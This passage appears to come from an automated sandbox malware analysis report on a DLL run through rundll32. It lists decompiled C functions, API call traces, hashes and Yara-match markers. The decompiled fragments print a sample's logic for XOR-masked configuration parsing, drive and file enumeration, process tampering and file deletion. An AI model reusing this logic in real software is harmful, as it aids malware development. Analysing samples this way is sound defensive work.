                                            • Part of subcall function 048978E7: SysFreeString.OLEAUT32(00000000), ref: 04897941
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreelstrlen
                                          • String ID:
                                          • API String ID: 3808004451-0
                                          • Opcode ID: 3e12a618e76613612c88590a03c75b7d088da12fee36e51f9177720faa5e41a9
                                          • Instruction ID: 781ae2f75f70b1e339c661aa87c0502da9e527989597d88ecb6e07bcb21cdb4e
                                          • Opcode Fuzzy Hash: 3e12a618e76613612c88590a03c75b7d088da12fee36e51f9177720faa5e41a9
                                          • Instruction Fuzzy Hash: 03F07F3200060ABBDF025F90DC05EAA3BAAEB18354F088514FE1494160DB72D9B1EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04896D7F(void* __edi, void* _a4) {
                                          				int _t7;
                                          				int _t12;
                                          
                                          				_t7 = E048955D3(__edi, _a4,  &_a4); // executed
                                          				_t12 = _t7;
                                          				if(_t12 != 0) {
                                          					memcpy(__edi, _a4, _t12);
                                          					 *((char*)(__edi + _t12)) = 0;
                                          					E04894C73(_a4);
                                          				}
                                          				return _t12;
                                          			}
                                          0x04896d8b
                                          0x04896d90
                                          0x04896d94
                                          0x04896d9b
                                          0x04896da6
                                          0x04896daa
                                          0x04896daa
                                          0x04896db3

                                          APIs
                                            • Part of subcall function 048955D3: memcpy.NTDLL(00000000,00000110,?,?,?,?,04896D90,?,048958B7,048958B7,?), ref: 04895609
                                            • Part of subcall function 048955D3: memset.NTDLL ref: 0489567F
                                            • Part of subcall function 048955D3: memset.NTDLL ref: 04895693
                                          • memcpy.NTDLL(?,048958B7,00000000,?,048958B7,048958B7,?,?,048958B7,?), ref: 04896D9B
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                          • Instruction ID: 41e2caf78656c6e46c661f79169ba1141a52a0e7edc91bc95492530363f19f2b
                                          • Opcode Fuzzy Hash: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                          • Instruction Fuzzy Hash: 18E086334089287BDF122A98DC00EEB7F9D9F45A94F084610FD08D5114D671EE1093E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B6CC67
                                            • Part of subcall function 00B66278: RegOpenKeyExA.KERNEL32(00B6CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,00B6CC7F,80000001,?,00B66085), ref: 00B662BF
                                            • Part of subcall function 00B66278: RegOpenKeyExA.ADVAPI32(00B6CC7F,00B6CC7F,00000000,00020019,80000001,?,00B6CC7F,80000001,?,00B66085), ref: 00B662D5
                                            • Part of subcall function 00B66278: RegCloseKey.KERNEL32(80000001,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001,?,00B66085), ref: 00B6631E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Open$Closememset
                                          • String ID:
                                          • API String ID: 1685373161-0
                                          • Opcode ID: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                          • Instruction ID: 11e2485c4209a81d3a6bbf14ac34fd1491847b596f9ff6a85fd546d524111a09
                                          • Opcode Fuzzy Hash: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                          • Instruction Fuzzy Hash: B8E0173024010CBBDB14AE54CC52FA97BA9EF14350F00C069BE0C5F282DA79EA60CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,00B750E8,0000002C,00B5B707,06148E36,?,00000000,00B5A3F0,?,00000318), ref: 00B64878
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 8b15ddb4c0ae156d8227d14d05d61dfae6f4caef44abad0a7d075d7eb6bcb724
                                          • Instruction ID: 3b4ef476848c86bca89e1a8fff9c1cfe4eb9e9b63e85f06d7eaf9e85c82d7d25
                                          • Opcode Fuzzy Hash: 8b15ddb4c0ae156d8227d14d05d61dfae6f4caef44abad0a7d075d7eb6bcb724
                                          • Instruction Fuzzy Hash: 2FD0E231D00629DBCB219BA4DC4699EFBB1BB08B21B608264E564671A0C72019558B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                            • Part of subcall function 00B6294B: ExpandEnvironmentStringsW.KERNEL32(00B5AE31,00000000,00000000,00000001,00000000,00000000,?,00B5AE31,00000000,?,?,00000000), ref: 00B62962
                                            • Part of subcall function 00B6294B: ExpandEnvironmentStringsW.KERNEL32(00B5AE31,00000000,00000000,00000000), ref: 00B6297C
                                          • lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                          • lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                          • memset.NTDLL ref: 00B55AB4
                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                          • lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                          • lstrlenW.KERNEL32(?), ref: 00B55B0F
                                          • memset.NTDLL ref: 00B55B32
                                          • wcscpy.NTDLL ref: 00B55B44
                                          • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B55B6A
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B55BA0
                                            • Part of subcall function 00B5C6B8: RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B55BBC
                                          • FindNextFileW.KERNEL32(?,00000000), ref: 00B55BD5
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B55BE7
                                          • FindClose.KERNEL32(?), ref: 00B55BFC
                                          • FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55C10
                                          • lstrlenW.KERNEL32(0000002C), ref: 00B55C32
                                          • FindNextFileW.KERNEL32(?,00000000), ref: 00B55CA8
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B55CBA
                                          • FindClose.KERNEL32(?), ref: 00B55CD5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                          • String ID:
                                          • API String ID: 2962561936-0
                                          • Opcode ID: 6a703737a84e8d8784555b5b7baac1b3b1f477b80210c7b9a7a4fbcc2fbceffd
                                          • Instruction ID: 885528df8893255edf6bed86b90964105afaaf05d94b952970f7108c9fc42756
                                          • Opcode Fuzzy Hash: 6a703737a84e8d8784555b5b7baac1b3b1f477b80210c7b9a7a4fbcc2fbceffd
                                          • Instruction Fuzzy Hash: EA819E71504705AFC721AF68DC84F1BBBE8FF88306F0448A9F99997262DB74D8588F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51E88
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51EBA
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51EEC
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51F1E
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51F50
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51F82
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51FB4
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B51FE6
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 00B52018
                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B521AB
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?), ref: 00B5224F
                                            • Part of subcall function 00B6A2FF: RtlAllocateHeap.NTDLL ref: 00B6A340
                                            • Part of subcall function 00B6A2FF: memset.NTDLL ref: 00B6A354
                                            • Part of subcall function 00B6A2FF: GetCurrentThreadId.KERNEL32 ref: 00B6A3E1
                                            • Part of subcall function 00B6A2FF: GetCurrentThread.KERNEL32 ref: 00B6A3F4
                                            • Part of subcall function 00B5CDBF: RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B5CDC8
                                            • Part of subcall function 00B5CDBF: HeapFree.KERNEL32(00000000,?), ref: 00B5CDFA
                                            • Part of subcall function 00B5CDBF: RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B5CE18
                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B521F7
                                            • Part of subcall function 00B53997: lstrlen.KERNEL32(?,00000000,76D86980,00000000,00B6780A,?), ref: 00B539A0
                                            • Part of subcall function 00B53997: memcpy.NTDLL(00000000,?,00000000,?), ref: 00B539C3
                                            • Part of subcall function 00B53997: memset.NTDLL ref: 00B539D2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3296958911-0
                                          • Opcode ID: 66198abff073af17ef9798494ff134cce81facdc5a0c60bbd37b621b47dd00cd
                                          • Instruction ID: f567779b505911bce40729ebbb15f8a4c333955e3b259077c23fe4c0d7a827b6
                                          • Opcode Fuzzy Hash: 66198abff073af17ef9798494ff134cce81facdc5a0c60bbd37b621b47dd00cd
                                          • Instruction Fuzzy Hash: B1F1C4B1A01516AF9B10EB78CC89F6F33E8DB4934175588E0AC09F7240EF35DE898B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,69B25F44,00000000,?,?,00B5335A,?,00000000,?), ref: 00B65863
                                          • GetLastError.KERNEL32(?,?,00B5335A,?,00000000,?), ref: 00B65871
                                          • NtSetInformationProcess.NTDLL ref: 00B658CB
                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00B6590A
                                          • GetProcAddress.KERNEL32(?), ref: 00B6592B
                                          • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 00B65982
                                          • CloseHandle.KERNEL32(?), ref: 00B65998
                                          • CloseHandle.KERNEL32(?), ref: 00B659BE
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                          • String ID:
                                          • API String ID: 3529370251-0
                                          • Opcode ID: 42a79639f58f19bf6d649efb292153f35e3b3ba80b4893b6ed84c0d80edab54a
                                          • Instruction ID: e41218286bdcb415a8b52e6014463b6f52c2ce25f89e5931b9f62b060e11c692
                                          • Opcode Fuzzy Hash: 42a79639f58f19bf6d649efb292153f35e3b3ba80b4893b6ed84c0d80edab54a
                                          • Instruction Fuzzy Hash: 5E41AF71108745EFD7209F24CC48A6BBBF5FB88319F000A6DF599A7160D77489A8CF52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • wcscpy.NTDLL ref: 00B5594F
                                          • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00B5595B
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5596C
                                          • memset.NTDLL ref: 00B55989
                                          • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 00B55997
                                          • WaitForSingleObject.KERNEL32(00000000), ref: 00B559A5
                                          • GetDriveTypeW.KERNEL32(?), ref: 00B559B3
                                          • lstrlenW.KERNEL32(?), ref: 00B559BF
                                          • wcscpy.NTDLL ref: 00B559D1
                                          • lstrlenW.KERNEL32(?), ref: 00B559EB
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B55A04
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                          • String ID:
                                          • API String ID: 3888849384-0
                                          • Opcode ID: 784ed61d3829737415c34f618987a645f66ce758ae173cfdf00a40ee219ec8de
                                          • Instruction ID: 50e455303d91c487ab8dfb7a397e63eb094123fd703413d21ce1aaafcdfd46f3
                                          • Opcode Fuzzy Hash: 784ed61d3829737415c34f618987a645f66ce758ae173cfdf00a40ee219ec8de
                                          • Instruction Fuzzy Hash: 2231217280010CFFDB119BA4DC84DEEBBBDEF09326B104496F509E3120DB359E959B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E0489475F(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                          				int _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				signed int _t28;
                                          				signed int _t33;
                                          				signed int _t39;
                                          				char* _t45;
                                          				char* _t46;
                                          				char* _t47;
                                          				char* _t48;
                                          				char* _t49;
                                          				char* _t50;
                                          				void* _t51;
                                          				void* _t52;
                                          				void* _t53;
                                          				intOrPtr _t54;
                                          				void* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr _t58;
                                          				signed int _t61;
                                          				intOrPtr _t64;
                                          				signed int _t65;
                                          				signed int _t70;
                                          				void* _t72;
                                          				void* _t73;
                                          				signed int _t75;
                                          				signed int _t78;
                                          				signed int _t82;
                                          				signed int _t86;
                                          				signed int _t90;
                                          				signed int _t94;
                                          				signed int _t98;
                                          				void* _t101;
                                          				void* _t102;
                                          				void* _t115;
                                          				void* _t118;
                                          				intOrPtr _t121;
                                          
                                          				_t118 = __esi;
                                          				_t115 = __edi;
                                          				_t104 = __ecx;
                                          				_t101 = __ebx;
                                          				_t28 =  *0x489a344; // 0x69b25f44
                                          				if(E04894556( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                          					 *0x489a378 = _v8;
                                          				}
                                          				_t33 =  *0x489a344; // 0x69b25f44
                                          				if(E04894556( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                          					_v12 = 2;
                                          					L69:
                                          					return _v12;
                                          				}
                                          				_t39 =  *0x489a344; // 0x69b25f44
                                          				_push(_t115);
                                          				if(E04894556( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                          					L67:
                                          					HeapFree( *0x489a2d8, 0, _v16);
                                          					goto L69;
                                          				} else {
                                          					_push(_t101);
                                          					_t102 = _v12;
                                          					if(_t102 == 0) {
                                          						_t45 = 0;
                                          					} else {
                                          						_t98 =  *0x489a344; // 0x69b25f44
                                          						_t45 = E0489296E(_t104, _t102, _t98 ^ 0x7895433b);
                                          					}
                                          					_push(_t118);
                                          					if(_t45 != 0) {
                                          						_t104 =  &_v8;
                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                          							 *0x489a2e0 = _v8;
                                          						}
                                          					}
                                          					if(_t102 == 0) {
                                          						_t46 = 0;
                                          					} else {
                                          						_t94 =  *0x489a344; // 0x69b25f44
                                          						_t46 = E0489296E(_t104, _t102, _t94 ^ 0x219b08c7);
                                          					}
                                          					if(_t46 != 0) {
                                          						_t104 =  &_v8;
                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                          							 *0x489a2e4 = _v8;
                                          						}
                                          					}
                                          					if(_t102 == 0) {
                                          						_t47 = 0;
                                          					} else {
                                          						_t90 =  *0x489a344; // 0x69b25f44
                                          						_t47 = E0489296E(_t104, _t102, _t90 ^ 0x31fc0661);
                                          					}
                                          					if(_t47 != 0) {
                                          						_t104 =  &_v8;
                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                          							 *0x489a2e8 = _v8;
                                          						}
                                          					}
                                          					if(_t102 == 0) {
                                          						_t48 = 0;
                                          					} else {
                                          						_t86 =  *0x489a344; // 0x69b25f44
                                          						_t48 = E0489296E(_t104, _t102, _t86 ^ 0x0cd926ce);
                                          					}
                                          					if(_t48 != 0) {
                                          						_t104 =  &_v8;
                                          						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                          							 *0x489a004 = _v8;
                                          						}
                                          					}
                                          					if(_t102 == 0) {
                                          						_t49 = 0;
                                          					} else {
                                          						_t82 =  *0x489a344; // 0x69b25f44
                                          						_t49 = E0489296E(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                          					}
                                          					if(_t49 != 0) {
                                          						_t104 =  &_v8;
                                          						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                          							 *0x489a02c = _v8;
                                          						}
                                          					}
                                          					if(_t102 == 0) {
                                          						_t50 = 0;
                                          					} else {
                                          						_t78 =  *0x489a344; // 0x69b25f44
                                          						_t50 = E0489296E(_t104, _t102, _t78 ^ 0x2878b929);
                                          					}
                                          					if(_t50 == 0) {
                                          						L41:
                                          						 *0x489a2ec = 5;
                                          						goto L42;
                                          					} else {
                                          						_t104 =  &_v8;
                                          						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                          							goto L41;
                                          						} else {
                                          							L42:
                                          							if(_t102 == 0) {
                                          								_t51 = 0;
                                          							} else {
                                          								_t75 =  *0x489a344; // 0x69b25f44
                                          								_t51 = E0489296E(_t104, _t102, _t75 ^ 0x261a367a);
                                          							}
                                          							if(_t51 != 0) {
                                          								_push(_t51);
                                          								_t72 = 0x10;
                                          								_t73 = E04893A24(_t72);
                                          								if(_t73 != 0) {
                                          									_push(_t73);
                                          									E04893F7E();
                                          								}
                                          							}
                                          							if(_t102 == 0) {
                                          								_t52 = 0;
                                          							} else {
                                          								_t70 =  *0x489a344; // 0x69b25f44
                                          								_t52 = E0489296E(_t104, _t102, _t70 ^ 0xb9d404b2);
                                          							}
                                          							if(_t52 != 0 && E04893A24(0, _t52) != 0) {
                                          								_t121 =  *0x489a3cc; // 0x52495b0
                                          								E048968F5(_t121 + 4, _t68);
                                          							}
                                          							if(_t102 == 0) {
                                          								_t53 = 0;
                                          							} else {
                                          								_t65 =  *0x489a344; // 0x69b25f44
                                          								_t53 = E0489296E(_t104, _t102, _t65 ^ 0x3df17130);
                                          							}
                                          							if(_t53 == 0) {
                                          								L59:
                                          								_t54 =  *0x489a348; // 0x9ad5a8
                                          								_t22 = _t54 + 0x489b252; // 0x616d692f
                                          								 *0x489a374 = _t22;
                                          								goto L60;
                                          							} else {
                                          								_t64 = E04893A24(0, _t53);
                                          								 *0x489a374 = _t64;
                                          								if(_t64 != 0) {
                                          									L60:
                                          									if(_t102 == 0) {
                                          										_t56 = 0;
                                          									} else {
                                          										_t61 =  *0x489a344; // 0x69b25f44
                                          										_t56 = E0489296E(_t104, _t102, _t61 ^ 0xd2079859);
                                          									}
                                          									if(_t56 == 0) {
                                          										_t57 =  *0x489a348; // 0x9ad5a8
                                          										_t23 = _t57 + 0x489b791; // 0x6976612e
                                          										_t58 = _t23;
                                          									} else {
                                          										_t58 = E04893A24(0, _t56);
                                          									}
                                          									 *0x489a3e0 = _t58;
                                          									HeapFree( *0x489a2d8, 0, _t102);
                                          									_v12 = 0;
                                          									goto L67;
                                          								}
                                          								goto L59;
                                          							}
                                          						}
                                          					}
                                          				}
                                          			}

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04894804
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04894836
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04894868
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0489489A
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 048948CC
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,0489A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 048948FE
                                          • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 048949FD
                                          • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04894A11
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7a0a2b9c974cbf79f392a6814d4574c40ecb608854ec1359b1817e83547e9353
                                          • Instruction ID: 4a6173bd2eef4962fc601b8c62b83db9b4116e074847e8bd18acc34339edc4cb
                                          • Opcode Fuzzy Hash: 7a0a2b9c974cbf79f392a6814d4574c40ecb608854ec1359b1817e83547e9353
                                          • Instruction Fuzzy Hash: EC818070B14E44ABDF15EBB89984D6F77E9EB48A0472C0F69E401E3104EA79FD42A760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(74DB06E0,00000000,00000000,74DB06E0,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AB8
                                            • Part of subcall function 00B53AA7: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,80000001,00B68CB5,?,74DB06E0,00B5407B,?,?,00000000,?), ref: 00B53AD5
                                          • FreeLibrary.KERNEL32(?), ref: 00B5CF57
                                            • Part of subcall function 00B60F11: lstrlenW.KERNEL32(?,00000000,?,?,?,00B5CE9C,?,?), ref: 00B60F1E
                                            • Part of subcall function 00B60F11: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,00B5CE9C,?,?), ref: 00B60F47
                                            • Part of subcall function 00B60F11: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00B60F67
                                            • Part of subcall function 00B60F11: lstrcpyW.KERNEL32(-00000002,?), ref: 00B60F83
                                            • Part of subcall function 00B60F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F8F
                                            • Part of subcall function 00B60F11: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,00B5CE9C,?,?), ref: 00B60F92
                                            • Part of subcall function 00B60F11: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F9E
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B60FBB
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B60FD5
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B60FEB
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B61001
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B61017
                                            • Part of subcall function 00B60F11: GetProcAddress.KERNEL32(00000000,?), ref: 00B6102D
                                          • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00B5CEAD
                                          • lstrlenW.KERNEL32(?), ref: 00B5CEC9
                                          • lstrlenW.KERNEL32(?), ref: 00B5CEE1
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B5CEFA
                                          • lstrcpyW.KERNEL32(00000002), ref: 00B5CF0F
                                            • Part of subcall function 00B5414B: lstrlenW.KERNEL32(?), ref: 00B5415B
                                            • Part of subcall function 00B5414B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 00B5417D
                                            • Part of subcall function 00B5414B: lstrcpyW.KERNEL32(00000000,?), ref: 00B541A9
                                            • Part of subcall function 00B5414B: lstrcatW.KERNEL32(00000000,?), ref: 00B541BC
                                          • FindNextFileW.KERNEL32(?,00000010), ref: 00B5CF37
                                          • FindClose.KERNEL32(00000002), ref: 00B5CF45
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                          • String ID:
                                          • API String ID: 1209511739-0
                                          • Opcode ID: 13df244c6848cf4968d9a95c89c6cf181a3205781da035031d71152cebca3ffd
                                          • Instruction ID: f687b9034d2645e0794ae0df28910961fa07beb292fd254caad177556e54c1b4
                                          • Opcode Fuzzy Hash: 13df244c6848cf4968d9a95c89c6cf181a3205781da035031d71152cebca3ffd
                                          • Instruction Fuzzy Hash: 56416D710083059FC711EF64DC49A2FBBEAFB88B06F0409A9F984A3150DB35DA5DCB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 00B5FCD8
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00B5FD41
                                          • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 00B5FD69
                                          • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00B5FDBB
                                          • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00B5FDC6
                                          • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00B5FDD9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
